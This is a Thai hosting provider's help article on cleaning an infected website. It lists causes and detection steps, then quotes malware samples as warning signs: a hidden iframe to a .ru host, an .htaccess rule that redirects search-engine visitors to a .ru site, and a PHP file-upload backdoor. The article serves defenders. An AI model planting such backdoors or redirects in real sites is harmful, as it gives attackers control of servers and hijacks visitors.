เว็บไซต์ติดไวรัส ทำยังไงดี!!

เว็บไซต์ติดไวรัส ทำยังไงดี!!

หน้าเว็บไซต์ติดไวรัส, เว็บไซต์อันตราย, เว็บถูกบล๊อค


สาเหตุของปัญหาเว็บไซต์ติดไวรัส

    -  กรณีใช้เป็น opensource เช่น joomla, smf board, wordpress, ฯลฯ ไม่มีการ upgrade โปรแกรม หรือ แก้ permission สิทธิของไฟล์ให้เหมาะสม
    -  กรณีใช้งาน Flash ตัวโปรแกรม flash เองจะมีการใช้งาน script ที่เป็น .js (java) หากไม่มีการ upgrade โปรแกรม flash ก็จะมีช่องโหว่
    -  กรณีใช้งาน code iframe ควรจะเปลี่ยนไปเป็น code DIV แทน เพื่อปิดช่องโหว่ของ iframe
    -  กรณีใช้ source free เช่น jquery, code editor, template, module, component, plugin ซึ่งดาวโหลดจากที่อื่นมาใช้งานในเว็บไซต์
และไม่มีการอัพเกรด หรือแก้ permission สิทธิของไฟล์ให้เหมาะสม

วิธีการตรวจสอบไฟล์เว็บไซต์ติดไวรัส

1.  ทำการ ดาวโหลดไฟล์จากโฮสติ้ง ลงมาตรวจสอบที่เครื่องคอมพิวเตอร์ ผ่านโปรแกรม FTP  วิธีการใช้งาน ftp
2.  ให้สังเกตุ วันที่มีการแก้ไขไฟล์เว็บไซต์ล่าสุด โดยที่เราไม่ได้เป็นผู้แก้ไข อาจจะมี script virus แทรกอยู่
3.  ให้สังเกตุไฟล์ที่มีชื่อแปลกๆ เช่น .htaccess, 404.php, 1234.php, xx.php, xdfasfsd.html ฯลฯ อาจจะมี script virus แทรกอยู่
4.  หากใช้เป็น opensource ให้ทำการอัพเกรด โปรแกรมให้เป็นเวอร์ชั่นใหม่เสมอ เพื่อป้องกันช่องโหว่ของเว็บไซต์
(ควรปิด module, component, plugin ที่ไม่ได้เป็นค่ามาตราฐานที่มาพร้อมกับโปรแกรม opensource ทั้งหมดก่อนทำการอัพเกรด
และ ก่อนการอัพเกรด ต้องทำการสำรองข้อมูลไว้ เพื่อป้องกันกรณีใช้งานไม่ได้)
5.  ทำการ ลบข้อมูลเว็บไซต์เดิม ที่อยู่บนโฮสติ้ง ออกทั้งหมด
6.  ทำการอัพโหลดข้อมูลขึ้นไปบนโฮสติ้ง อีกครั้ง
7.  ทำการแก้สิทธิเจ้าของไฟล์ (permission) ให้เหมาะสม หากเว็บไซต์ไม่ต้องการเปลี่ยนแปลงควรแก้สิทธิเป็น
444 หรือ 555 สำหรับการอ่านข้อมูลอย่างเดียว
8.  ทำการสมัคร google webmaster tool สำหรับช่วยตรวจสอบเว็บไซต์

ตัวอย่าง code script virus

ตัวอย่างที่ 1 (ข้อสังเกตุ มักจะพบมาจาก .ru / และถูกซ้อนด้วย tag style="visibility: hidden" )

<iframe src="hxxp://xxx.ru:8080/index.php" width=145 height=199 style="visibility: hidden"></iframe>

ตัวอย่างที่ 2 (ส่วนใหญ่จะอยู่ในไฟล์ .js)

function DOMException(c){Error.apply(this,arguments);this.code=c;var b=["","Index Size Error","DOMString Size Error","
Hierarchy Request Error","Wrong Document Error","Invalid Character Error","No Data Allowed Error","
No Modification Allowed Error","Not Found Error","Not Supported Error","Inuse Attribute Error","Invalid State Error","
Syntax Error","Invalid Modification Error","Namespace Error","Invalid Access Error"];this.message=b[c];

ตัวอย่างที่ 3 (จะอยู่ในไฟล์ .htaccss)

ให้สังเกตุ base64_decode

หรือ มีการทำ rewrite เปลี่ยน ลิงค์เว็บไซต์เราให้ไปที่เว็บไซต์อื่น

<IfModule mod_rewrite.c> RewriteEngine On RewriteCond % ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|
RewriteRule ^(.*)$ lam-siu.ru/indigo?5 [R=301,L] RewriteCond %

ตัวอย่างที่ 4 (จะอยู่ในไฟล์ที่ชื่อแปลกๆ จะมีการเขียน code ให้มีการ upload virus ไปยังเว็บไซต์)

เช่น ไฟล์ 404.php

<?php if (isset($_FILES["elf"]) and ! $_FILES["elf"]["error"] ) {@move_uploaded_file($_FILES["elf"]["tmp_name"], $_FILES["elf"]["name"]) ;      echo $ifupload=" ItsOk ";}  ?>



Hai trovato questa risposta utile?

 Stampa Articolo

Leggi anche

ต้องใช้เวลานานเท่าไรหลังจากที่จ่ายเงินแล้วถึงจะสามารถ อัพโหลดเว็บไซต์ได้

ภายใน 24 ชั่วโมงในวันเวลาทำการ  เพื่อตรวจสอบการจ่ายเงินในกรณีที่ท่านใช้วิธีโอนเงินผ่านทางธนาคาร...

สามารถใช้ภาษา ASP, ASP.NET หรือ JSP กับไชโย โฮสติ้งได้หรือไม่

ไชโย โฮสติ้งของเรามีระบบรองรับให้ลูกค้าสามารถใช้ ASP และ JSP ได้ทั้ง 2 ระบบ (Linux & Windows)...

การใช้ภาษาไทยกับ TIS-620

การเลือกใช้ Charset TIS-620 และ UTF-8 ใน MySQL ทางเราแนะนำให้ใช้เป็น UTF-8...

ปลดล็อค "เว็บไซท์ อันตราย" กับ webmaster tool

ปลดล็อค "เว็บไซท์ อันตราย" กับ webmaster tool 1. เข้าไปที่ http://www.google.com/webmasters/ 2....

วิธีการเปลี่ยน File hosts

การเปลี่ยน File hosts จะใช้ในกรณีที่ต้องการตรวจสอบหน้าเว็บ หรืออีเมล์ที่ Server เครื่องใหม่ หรือ...